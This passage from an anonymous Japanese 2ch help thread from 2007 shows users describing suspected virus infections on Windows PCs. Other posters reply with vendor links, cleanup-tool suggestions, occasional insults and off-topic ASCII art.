【症状が出る前に何をやったか】 「いつものネット閲覧」
【症状を解決しようとどのような処置を取ったか】 「上記ウィルスソフトを新しく購入、スキャン」
【その他の質問】 「システムまで侵食してて手遅れということでしょうか・・・orz」

495 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/10(火) 23:41:43 ]
>>494
一時的に、BitDefender 8 Free Editionを入れて削除を試みる
その後はアンインストールする(BitDefenderの使ったレジストリは手動削除する)

496 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/11(水) 00:15:46 ]
>>494
> あとたまに立ち上げようとするとピーピーとうるさい音が鳴ることがある(どうしようもないので強制終了してます)」

こっちはウイルス無関係で、メモリエラーとかCPUエラーとか出てるんじゃないかと。

497 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/11(水) 14:23:31 ]
新たなマルウェア情報
pc11.2ch.net/test/read.cgi/software/1066660518/714

498 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/11(水) 20:16:31 ]
先月のだろ

499 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/11(水) 20:45:02 ]
先月出た悪質ルートキットを、
マイクロソフトやNOD32は、
まだ検出できないでいるんだな・・・・orz

500 名前:名無しさん@お腹いっぱい。 [2007/07/12(木) 13:48:24 ]
Trojan-Downloader.BAT.Ftp.z(常駐ウイルスバスター。オンラインスキャン→SGアンチスパイ2で発見)
に感染してしまいました。
ttp://www.viruslist.com/en/viruses/encyclopedia?virusid=76015

このトロイの木馬の情報を教えて下さい。
調べてみると、sdbot(agobot ?)系のワーム/バックドアをダウンロードしようとする
Downloader型のトロイの木馬であるらしいのですが、外国のサイトが多かったので、
この理解であっているのか自信がありません。
よろしくお願いします。



501 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/12(木) 14:03:07 ]
【使用OS】 「Windows 2000 SP4」
【Microsoft Update(MU)の状態】 「最新」 
【使用セキュリティソフトとバージョン】 「AntiVir パーソナルエディション」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」 
【スパイウェア対策ソフト】 「無し」 
【ルータの有無】 「有り」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
AntiVirでは検出されず、ネットワークにも接続できず、
OSの再インストールも現在できないためウイルス名は不明ですが
Anito.AやPE_FUBALCA.Aの亜種?かと思います

【どんな症状が出るか】

最初
「起動時にブラウザが立ち上がりunion123.comに接続しに行く」

リカバリしようとする
「リカバリしようとするが途中でエラーを吐いて終了してしまう」
「WindowsCDからフォーマットしようとしても完了しない」

「ウイルスに感染していないHDDを接続してフォーマットしようとしたがBIOSすら起動しなくなった。」


【症状が出る前に何をやったか】
「知り合いのHDDのデータを復旧しようと俺のPCに接続。
接続した瞬間にHDD内にあったautorun.exeが立ち上がりウイルスに感染?」

HDD変えても直らないってことはBIOS ROMか
マザボ交換しなきゃダメですかね?もう俺涙目・・・

502 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/12(木) 14:37:34 ]
>>500
ttp://www.bitdefender.com/VIRUS-43596-en--Backdoor.BotGet.FtpB.Gen.html

503 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/12(木) 14:53:58 ]
>>501
メーカー製か自作か判らんが、FDD,CD,HDDを全部外して、BIOSは起動する?

AnitoかPE_FUBALCAだろうと思うけど、BIOSを破壊する程危険とは書いてなかったなぁ。

504 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/12(木) 15:10:11 ]
BIOSに干渉するようなウィルスなんて作れるの?


505 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/12(木) 15:12:42 ]
そりゃ作れるし、昔はそんなのばかりだったけど、今現在BIOSにアクセスする意味は
破壊活動以外に無いし。

そういう自滅型ウイルスはハヤリじゃないと思うが。

506 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/12(木) 15:35:46 ]
流石にCD-ROMドライブに感染するウィルスはないよね?

507 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/12(木) 22:24:05 ]
www.itmedia.co.jp/enterprise/articles/0703/05/news080.html

508 名前:494 mailto:sage [2007/07/12(木) 23:46:11 ]
>>495>>496
ありがとうございます。
それを使ってみたところ、新たにトロイがいくつか検出されました
・・・が、駆除してもやはり症状は治らず・・・
これはもうウィルスよりもシステム的な問題なんでしょうか?
素人なのでメモリエラーとかCPUエラーの場合、何をどういじればいいのかわかりません・・・orz

509 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/13(金) 09:24:45 ]
俺みたいに金の無い奴は頭を使う。
お前みたいに頭の無い奴は金を使え。

510 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/14(土) 17:43:41 ]
>>508
新しい電源買え。
俺も似たような状況になったとき電源変えたら直った。



511 名前:名無しさん@お腹いっぱい。 [2007/07/14(土) 19:15:58 ]
【使用OS】 「2000SP4」
【Microsoft Update(MU)の状態】 「とまってる」 
【使用セキュリティソフトとバージョン】 「avast!4.7」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「yes」 
【スパイウェア対策ソフト】 「ない」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「X」
【ルータの有無】 「あり。だけどDMZで使っていたので意味ないと」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「W32:tenga-B」

【どんな症状が出るか】 「自覚症状なし」
【症状が出る前に何をやったか】 「洒落とかwinnyで落としまくり、キンタマ解凍しまくり。exeやscrみたいなのは踏んでない」
【症状を解決しようとどのような処置を取ったか】 「感染ファイル全削除」
【その他の質問】 「W32:tenga-Bってなんだろ」



512 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/14(土) 19:48:31 ]
      , イ)ィ -─ ──- 、ミヽ
      ノ /,.-‐'"´ `ヾj ii /  Λ
    ,イ// ^ヽj(二フ'"´ ̄`ヾ、ノイ{
   ノ/,/ミ三ニヲ´        ゙、ノi!
  {V /ミ三二,イ ,  /,   ,\  Yソ
  レ'/三二彡イ  .:ィこラ   ;:こラ  j{
  V;;;::. ;ヲヾ!V    ー '′ i ー ' ソ
   Vニミ( 入 、      r  j  ,′
   ヾミ、`ゝ  ` ー--‐'ゞニ<‐-イ
     ヽ ヽ     -''ニニ‐  /
        |  `、     ⌒  ,/
       |    >┻━┻'r‐'´
      ヽ_         |
         ヽ _ _ 」

  ググレカス [ Gugurecus ]
   (2007 〜 没年不明)

513 名前:名無しさん@お腹いっぱい。 [2007/07/14(土) 20:00:54 ]
すみません。今日、パソコンを使っていたら、急にキーボードの右半分が数字しか打てなくなってしまったのですが、ウィルスでしょうか?改善方法がありましたら教えてください。ちなみにスクリーンキーボードという機能で、なんとかここにたどり着きました。

514 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/14(土) 20:04:48 ]
>>513
ノートPCか?
NumLockキーを押して、インジケーターを消せ。

515 名前:名無しさん@お腹いっぱい。 [2007/07/14(土) 20:26:56 ]
すぐに返答していただき本当にありがとうございます。元のように戻りました。しかしこのような症状は、ウィルスが原因なのでしょうか?心当たりは何も無いのですが。

516 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/14(土) 20:58:02 ]
>>515
ウイルスとは関係なし。
昔からある、PC用キーボードの仕様。
数値を連続して入力する際、右手だけで入力できるというメリットがある。
NumLockキーは押す度にON,OFFになるので、知らないうちに間違って押したのが原因。

517 名前:名無しさん@お腹いっぱい。 [2007/07/14(土) 21:04:54 ]
>>516
丁寧に教えていただき、ありがとうございました。

518 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/15(日) 00:16:52 ]
オンラインスキャンをしたら

C:\WINDOWS\real.exe は Downloader に感染しています。

と出てきたんですけど、このreal.exeって削除しておkなファイルですか?

519 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/15(日) 01:40:40 ]
>>518
自分のPCだろ…その程度の判断もできないならPC使わない方がいいよ
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2004-082510-2519-99&tabid=2

520 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/15(日) 01:49:05 ]
オンラインスキャンで引っ掛かってる時点で終わってると思う。
日頃の予防を



521 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/15(日) 05:46:35 ]
これって既出?
ttp://pnpk.net/cms/archives/145
安全にWEBブラウジングを行う@DropMyRights

522 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/15(日) 06:06:23 ]
CNET Japan
IEとFirefoxをインストールしている人は要注意--「非常に重大」なセキュリティリスク 2007/07/11
ttp://japan.cnet.com/news/sec/story/0,2000056024,20352586,00.htm
INTERNET Watch
Firefoxに危険度の高い脆弱性、IEからの呼び出しを悪用 2007/07/11
ttp://internet.watch.impress.co.jp/cda/news/2007/07/11/16317.html
Computerworld.jp
Firefox“プラス”IEで、PCを乗っ取られる脆弱性が発覚――修正パッチはいまだ配布されず  2007年07月12日
ttp://www.computerworld.jp/news/sec/70529.html
ITpro
Firefox 2.0のURIハンドラに重大な欠陥,IEとの組み合わせが危険,Secuniaが警告  2007/07/12
ttp://itpro.nikkeibp.co.jp/article/NEWS/20070712/277298/

523 名前:名無し [2007/07/15(日) 10:09:51 ]
>>518
その場合、削除するしかないと思う。
初期化をすることを考えたら、削除すべし。



524 名前:名無しさん@お腹いっぱい。 [2007/07/15(日) 10:39:55 ]
韓国がまたやってくれました
s3.s2ch.net/test/-/wwwww.2ch.net/news4vip/1184462358/

525 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/15(日) 10:40:24 ]
もうSistemフォルダごと丸々削除しちまえよw

526 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/15(日) 16:54:34 ]
> Sistem


527 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/15(日) 17:10:14 ]
そんな怪しいものは削除でw

528 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/15(日) 18:38:44 ]
オラバで調べようとしたら、「ちょっと通りますよ」ってAA
がながれたんだけど何?

529 名前:名無しさん@お腹いっぱい。 [2007/07/15(日) 19:21:23 ]
     _, ._
  ヽ( ゚ ∀゚) ノ    だれか〜!
  へノ   /    
    ω ノ
       >


530 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/15(日) 19:29:26 ]
つ説明書



531 名前:名無しさん@お腹いっぱい。 [2007/07/15(日) 19:55:13 ]
systemdoctorやらdevicedoctorやらwinantivirusやらが最近やたら五月蝿いんですが、
こいつらを開かないようにする方法はありますか?

532 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/15(日) 20:51:39 ]
そういう怪しいサイトに近づかない事かな

533 名前:531 [2007/07/15(日) 22:02:02 ]
>>532
google検索時や普通のサイト開いてても突然出てくるんです。

534 名前:名無しさん@お腹いっぱい。 [2007/07/15(日) 22:08:17 ]
既にやられてるな。
スキャンかけろ。

535 名前: ◆N9P3SuvBPo mailto:sage [2007/07/15(日) 23:47:44 ]
>533
SmitfraudFixとVundoFixで何とかならないかな?

536 名前:名無しさん@お腹いっぱい。 [2007/07/16(月) 00:06:41 ]
ttp://www.imgup.org/iup418893.png
これはウィルスですか?

537 名前:531 [2007/07/16(月) 03:42:39 ]
>>534-535
どうも。今のところ来なくなったので、解決した、と思いたいです。
ありがとうございました。

538 名前:531 [2007/07/16(月) 04:41:56 ]
と思ったらまた来ました。どうすればいいんでしょうか・・・。

539 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/16(月) 10:41:41 ]
【使用OS】 「WindowsXP SP2」
【Microsoft Update(MU)の状態】 「最新」 
【使用セキュリティソフトとバージョン】 「NortonAntiVirus
                        ただしウィルスを検出したのは上記のものではなく、
                        カスペルスキーのオンラインスキャンです。
                        ノートン先生にはスルーされました……。」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」 
【スパイウェア対策ソフト】 「Ad-aware、Spybot」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「最後に更新したのが1ヶ月ほど前です」
【ルータの有無】 「なし」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「〜\Alcohol Soft\Alcohol 52\
 Trojan.Win32.Agent.abd」
上記ソフト自体はだいぶ前にインストールしたものですが、
感染が確認できたのは最近です。

【どんな症状が出るか】 「今のところ症状は出ていません」
【症状が出る前に何をやったか】 「-」
【症状を解決しようとどのような処置を取ったか】 「-」
【その他の質問】 「このウィルスを駆除するにはどの駆除ソフトがおすすめでしょうか。
            また駆除後にOSの再インストールが必要でしょうか。」

540 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/16(月) 11:39:04 ]
>>538
pc11.2ch.net/test/read.cgi/sec/1162464139/



541 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/16(月) 12:07:29 ]
オンラインでポートスキャンできるサイトで
1-65535まで指定可能なとこってありますか?

542 名前:名無しさん@お腹いっぱい。 [2007/07/16(月) 12:37:08 ]
ttp://www.frogview.com/show1.php?file=3005

543 名前:531 [2007/07/16(月) 13:28:30 ]
>>540
誘導ありがとうございます。向こうで質問してみます。

544 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/16(月) 18:47:29 ]
ttp://winny.cool.ne.jp/lesson1/scan.html
ここでポートスキャンかけても開いてるはずのポートが閉じてると言われてしまうんですが、
(たとえば25とか110とか p2pで開けてるポート)
どうなってるんでしょうか?

545 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/16(月) 19:37:43 ]
>>524
ERROR:取得エラー
1:Not Found :2000/01/01 00:00:00 ID:???0
datの取得に失敗しました。

546 名前:名無しさん@お腹いっぱい。 [2007/07/16(月) 19:46:14 ]
【使用OS】 windows XP SP2
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 NOD32 ver,2.7
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 YES
【スパイウェア対策ソフト】 spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】 YES
【ルータの有無】 無し

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
出ない

【どんな症状が出るか】 URLにURLを打ち込んで飛ぶといきなりJwordという検索窓が開く

【症状が出る前に何をやったか】 PC security test 2007を使っていた。それ以外はウエブサイト閲覧のみ。
【症状を解決しようとどのような処置を取ったか】 NOD32,spybotによる全スキャン
【その他の質問】 
インストールした覚えがありません。
しかも追加と削除一覧にもソフトが見当たりません。助けてください。

547 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/16(月) 19:59:10 ]
>>546
Jwordをアンインストール

548 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/16(月) 20:05:46 ]
ウチのがどう見ても原田ウイルスかかったorz
家族が勝手にnyやって感染
ゼロの使い魔とかで引っかかるなよもう氏ねよ・・・

ノートン先生はスルー

549 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/16(月) 20:08:20 ]
さらばヲチスレ(´・ω・) カワイソス 山田ヲチスレ340
tmp6.2ch.net/test/read.cgi/download/1184486689/2-5



550 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/16(月) 20:18:54 ]
>>548
Vistaにして「保護者による制限」



551 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/16(月) 20:22:23 ]
Jwordはフィッシングサイト対策に有効だったりする?

552 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/16(月) 22:20:58 ]
fpupdateax.exeという怪しいファイルを発見したんですが、これってウィルスですか?
そうだとしたら対処法は?

553 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/16(月) 22:54:44 ]
fpupdateax.exe の検索結果 約 146 件

554 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/16(月) 23:18:51 ]
検索はしたんですけどイマイチ対策とか出てなくてですね
消去すればそれでいいんでしょうか?

555 名前: ◆N9P3SuvBPo mailto:sage [2007/07/16(月) 23:50:39 ]
>554
ファイルのプロパティ情報で判断or
ttp://virustotal.com/でスキャン

556 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/17(火) 00:06:53 ]
>>555
プロパティにはアプリケーションとしかでてないし、そのサイトでも何も見つかりませんでした
もしかすると無害なんでしょうか

557 名前: ◆N9P3SuvBPo mailto:sage [2007/07/17(火) 00:24:41 ]
>556
全般タブ以外に、バージョン情報タブは無かった?
著作権や会社名にMicrosoftの名前が無ければ黒と判断して良いかも。

558 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/17(火) 00:44:44 ]
>>557
すみませんバージョン情報タブというのは無いです
よくわからないのでとりあえず放置しておくことにします
どうもありがとう

559 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/17(火) 19:54:47 ]
「発電所もサイバー攻撃の対象になる」,米SANSのアラン・パーラー氏が警告
itpro.nikkeibp.co.jp/article/NEWS/20070717/277606/

560 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/18(水) 13:41:25 ]
「Generic PUP.h」って、どんなウイルス?



561 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/18(水) 16:41:29 ]
440 :名無しさん@お腹いっぱい。:2007/05/05(土) 15:41:14
Generic PUP.hてshareの事?

441 :名無しさん@お腹いっぱい。:2007/05/05(土) 16:09:59
shareとは限らない。shareをGeneric PUP.hとして検出しただけ。
怪しいプログラムor不審なプログラムのこと
www.mcafee.com/japan/security/virG2005.asp?v=Generic%20PUP.a

562 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/18(水) 17:19:23 ]
>>561
レスサンクス。

って事は、ウイルスとしての害は無いのか。 よかった。

563 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/19(木) 04:47:47 ]
そういや、まとめにゼオライマーってある?
あれたしか乳首見えてたし、sexシーンもあったはずだけど

564 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/19(木) 04:48:40 ]
すげー誤爆したorz
すまない

565 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/19(木) 05:03:22 ]
まだ載ってないな

566 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/19(木) 12:13:06 ]
ゼオライマーとは…かなりマイナーと言うべきか、それともマニアックというべきか…

567 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/20(金) 01:10:33 ]
マイルーラなら知っているのだが・・・

568 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/20(金) 04:18:07 ]
タスクマネージャを見てみるとTTClearFrame.exeという見慣れないプロセスが走っています。
終了させてみても特に問題ないようです。検索してもそれらしきファイルはなく、ぐぐってもでてきません。
気味悪いです。

569 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/20(金) 05:39:28 ]
日記はチラシの裏にでもどうぞ

570 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/20(金) 10:18:01 ]
レジストリとスタートアップはみたのですが、それらしきプロセスは確認できませんでした。
何かのウイルスでしょうか?



571 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/20(金) 18:40:50 ]
>>570
こういうの使ってプロセスの起動元になっているファイルを探す
ttp://cowscorpion.com/Process/ProExp.html
ttp://cowscorpion.com/Process/stm.html

ファイルパスや起動元のファイルの作成日時から
自分が過去に何やったか類推してみれ

572 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/22(日) 01:46:27 ]
ttp://okwave.jp/qa2931572.html
ごみ箱から検出=機能していない、という考え方は基本的には出来ません。ごみ箱内で潜伏しつつ活動するマルウェアもあります。ただし、今回見つかったのは隔離が効いた、ということなので、それ自体は大きな危険性はなさそうです。
だからといって…決して楽観視は出来ません。
複数の情報を総合して考えるに、ウイルスバスターでは検出出来ていないDownloader系の感染が存在しているように思われます。この隠れた感染がDC65.exeなどの他のマルウェアをPC内に引き込んでいると見られます。
早期の解決をお望みのようですが…感染の大本がつかめていない上に、他に何が入り込んでいてもおかしくない状況で自体はかなり深刻、感染の除去は容易ではないと考えるべきではないでしょうか。

最も推奨される対応策はリカバリやクリーンインストールによるOSの初期化です。

リカバリせずに何とかしたい、という場合にはウイルスバスター以外の手段で感染をチェックされることを推奨します。検出力に定評のあるカスペルスキーのオンラインスキャン辺りがお勧めです。(ただし、それでも未確認の感染を100%摘発出来るとは限りません)
www.kaspersky.co.jp/scanforvirus/?




┐( ⌒ω⌒)┌

573 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/24(火) 17:01:58 ]
Microsoft Help and Support
ウイルス対策ソフトウェア ベンダの一覧
ttp://support.microsoft.com/kb/49500/ja




574 名前:名無しさん@お腹いっぱい。 [2007/07/24(火) 17:47:31 ]
.avi     .scrのウィルスファイルをうっかり
メディアプレイヤーで再生しようとしてしまったんですが(もちろん再生などできなかった)
これってダブルクリックしていないからセーフですか?

他のaviファイルと一緒にドラッグしてwmpにドロップして再生しようとしてしまったんです。

タスクマネージャーを見ているんですが
CPU、メモリともなにか活動しているような雰囲気はないのですが・・・。



575 名前:名無しさん@お腹いっぱい。 [2007/07/24(火) 18:09:56 ]
原田ウィルス不覚にも踏んでしまった。
該当ファイルの削除。書き換えられてしまったファイルの削除済み。
ノートンは立ち上がらなくなり、CDexなどは書き換えられていた。

ローカルセキュリティポリシーがどうも動かないんですが、原田の影響ですかね?

576 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/24(火) 19:52:32 ]
>>574-575
>>14

577 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/24(火) 23:27:41 ]
2007年6月度 サイバークリーンセンター活動実績
https://www.ccc.go.jp/report/200706/0706monthly.html

578 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/25(水) 03:44:34 ]
>>575
ny厨涙目wwwwww

579 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/25(水) 08:43:57 ]
>>575
シマに検体送れ

580 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/25(水) 12:40:21 ]
役に立たねぇスレだな。
氏ねよ



581 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/25(水) 13:36:58 ]
くだらん質問するな

582 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/25(水) 18:04:54 ]
夏ですなぁ・・・


583 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/07/27(金) 20:36:37 ]
動向を追うならやっぱりここ!セキュリティ・ベンダーのブログ
itpro.nikkeibp.co.jp/article/COLUMN/20070723/278015/?ST=security

584 名前:名無しさん@お腹いっぱい。 [2007/07/31(火) 12:28:41 ]
NetSkyについておしえてください。
メールはMacにて行っております。
7月半ばから知らぬアドレスでNetSky(ネットスキャンの結果判明)を添付されて
ISP、企業名、大学名、フリーメールのアドレスからメールが届きます。
これはワタクシのアドレスを持った誰かのPCが感染してるという判断でよろしいですか?

ワタクシのメーラーに登録された人に勧告メール出してあげた方がよいですか?

585 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/01(水) 19:12:02 ]
ああ チャーハンが食いたい。

586 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/01(水) 19:45:17 ]
  ∧,,∧
 ( ・ω・)  呼んだ?
 / oo━ヽニニフ
 しー-J

587 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/01(水) 19:50:08 ]
食びたい

588 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/01(水) 22:23:32 ]
>>587
(交差法:目を寄せる)
  ∧,,∧       飛び出す             ∧,,∧         飛び出す
 (;`・ω・)  。・゚ ・⌒)チャーハン作るよ!! (;`・ω・)   。 ・゚・⌒) チャーハン作るよ!!
 /   o━ヽニニフ))                /   o ━ヽニニフ ))
 しー-J                         しー-J

        アッ! 。・゚・                      アッ!  。 ・ ゚・
  ∧,,∧ て     。・゚・。 ・ ゚・              ∧,,∧ て      。・ ゚・ 。 ・゚・
 (; ´゚ω゚)て   //               (; ´゚ω゚) て  //
 /   o━ヽニニフ                  /   o ━ヽニニフ
 しー-J    彡                   しー-J    彡

    ∧,,∧    ショボーン               ∧,,∧    ショボーン
   ( ´・ω・)                       ( ´・ω・)
  c(,_U_U      ・゚・。・ ゚・。・゚・ 。・゚・      c(,_U_U       ・゚・。・ ゚・。・゚・ 。・゚・
     ━ヽニニフ                      ━ヽニニフ

            よしバレてない                   よしバレてない
       クルッ ∧,,∧                     クルッ ∧,,∧
         ミ(・ω・´ )つ サッサ                    ミ(・ω・´ ) つ サッサ
         c( U・ ゚U。彡・ 。・゚・                    c( U・ ゚ U。彡・ 。 ・゚ ・
 ━ヽニニフ                      ━ヽニニフ

 ∧,,∧   。・。゚・。 ゚・。゚・できたよ〜.        ∧,,∧    。・。゚・。 ゚・。゚・ できたよ〜.
( ´・ω・)つ\・゚・ 。・゚・・/                 ( ´・ω・)つ \・゚・ 。・゚・・/

589 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/01(水) 22:26:19 ]
フッフッフ・・・  見てた。

590 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/01(水) 23:33:32 ]

              ∧ ∧ ∧,,∧,,∧∧,,∧
              ( (-( -( - ( -д( -д)  。・゚・⌒)
              (つ(つ/つ//  二つ━ヽニニフ))
            チァ─) .| /( ヽノ  ノヽっ ─・・・
               ∪∪とノ(/ ̄ ∪

                            ∧    。・゚・⌒)
         (。・゚・⌒((  (\_ ∧,,∧ ∧,,∧ Д)っ━ヽニニフ))
         ヽニニフ━⊂`ヽ( -д-) _)д-) )  ノノ。・゚・⌒)
              ヽ ⊂\  ⊂ )  _つ━ヽニニフ))
            アァ──(/( /∪∪ヽ)ヽ) ノ ──
                  ∪ ̄(/ ̄\)

             。・゚・。・゚・
             ヽニニフ━(\  ∧ ,,∧  
                    < `( `-ω・)
                     \ y⊂ ) ──…
                     /    \
                     ∪ ̄ ̄ ̄\)

                      ・゚・・゚・。・
                   o━ヽニニフ
                    ヽ ( `・ω・)  ハン !!
                     ヽ  ⊂ )
                      しー-ヽ)



591 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/01(水) 23:34:49 ]
               ゚・ 。  ・。
               。・゚・⌒)
  −=≡    _ _ o━ヽニニフ ))
 −=≡   ( ゚∀゚)彡。・゚。・⌒)
−=≡   ⊂   o━ヽニニフ ))
 −=≡   ( ⌒)  チャーハン!チャーハン!
  −=≡  c し'


チャーハン!!チャーハン!!
     ゚・ 。  ・。 ゚・ 。  ・。     ゚・ 。  ・。 ゚・ 。  ・。
        ゚・ 。 。・゚・⌒ヽ 。・゚。・          ゚・ 。 。・゚・⌒)
......................    −=≡ (( ヽニニフ━o  _ _ o━ヽニニフ )) ・。
......................    −=≡((ヽニ(⌒。・゚。・ ミ ( ゚∀゚)彡。・゚。・⌒) ニフ ))
.......................    −=≡   ((ヽニニフ━o   o━ヽニニフ )) ゚・
............................   −=≡((.ヽニ(⌒・゚・。彡 ( ⌒) ミ 。・゚・⌒)フ ))
 ゚・ 。  ・。 ゚・ 。 −=≡((ヽニニフ━o c し' o━ヽニニフ ))

592 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/01(水) 23:36:28 ]
             。・              。・
            。・               。・゚・
           。・               。・゚・。・゚・
          。・                。・゚・ 。・゚・
         。・               。・゚・ 。・゚・。・゚・
        。・            。・゚・。・゚・。・゚・ 。・゚・。・゚・
        。・        。・゚・。・゚・ 。・゚・。・゚・ 。・゚・ 。・゚・
  ∧,,∧   。・   。・゚・。。・゚・。・゚・。・゚・。・゚・。・゚・゚ ・。・゚・。・゚。・゚・
 (;`・ω・) 。・゚・。・゚・。・゚・。・゚・。・゚・。・゚・。・゚・。・゚・。・゚・ 。・゚・。・゚・。・
 /   o━ヽニニニニニニニニニニニニニニニニニニフ))   チャーハン作るよ!!
 しー-J


         ドドドドドドドドドドドド!!!!
。・゚・
 。・゚・。・゚・ 。・゚・。・゚・。・゚・。・゚・
。・゚・ 。・゚・・。・゚・。・゚・。・゚・。・・゚・。・゚・。・゚・。・
・。・・。・゚・ 。・゚・。・゚・・゚・。・゚・。・゚・。・゚・ 。・゚・。・゚・
。・゚・。・。・゚・。・゚・。・゚・。・゚・ 。・゚・・゚・。・。・゚・ 。・゚・。・゚・
 ・。・。・゚・。・゚・ 。・゚・。・゚・。・゚・。・゚・ 。。・゚・。・゚・ 。・゚・ 。・゚・
。・゚・。・゚・ 。・゚・。・゚・゚・。・゚・・゚・・゚・。・゚・。・゚・。・゚・゚ ・。・゚・。・゚。・゚・
 (;`・。・゚・。・゚・ 。・゚・。・゚。・゚・。・゚・。・゚・。・゚゚・。・゚・。・゚・ 。・゚・。・゚・。・
 / ・。・・。・ヽニニニニニニニニニニニニニニニニニニフ))   ぐおおおお!!
 し・。・・。・

593 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/01(水) 23:37:07 ]
      ━ヽニニフ    
      ━ヽニニフ              
      ━ヽニニフ    
      ━ヽニニフ     ∧ ,, ∧
      ━ヽニニフ    ( ´・ω・) みなさん、チャーハンは
     | ̄ ̄ ̄ ̄ ̄|─□(  つ_0     自分で作ってね
  〜 〜 ̄◎ ̄◎ ̄   ◎ヽJ┴◎

594 名前:名無しさん@お腹いっぱい。 [2007/08/01(水) 23:44:16 ]
スミマセン。教えてください。
ネットで取り込んだフリーGIF画像を会社の資料の一部で
利用した所、「ウィルスが入ってたらどうすんだ??」と怒られました、、、(涙
私のような素人認識だと、アプリケーション起動によって感染など聞くのですが
そんなウィルスあるんでしょうか?

595 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/01(水) 23:45:36 ]
>>594
腐るほどあるわな、このへんで覗いておいで

勇気がなくて踏めない人のための鑑定スレPart15
ttp://pc11.2ch.net/test/read.cgi/hack/1184605923/

596 名前:名無しさん@お腹いっぱい。 [2007/08/01(水) 23:51:07 ]
早速覗いてきました。JPEGの件はいろいろ調べたのですが
やっぱり一緒なんですかね、、、
なかったら上司に異議申し立てようと思ってたのですが、残念!

597 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/01(水) 23:57:51 ]
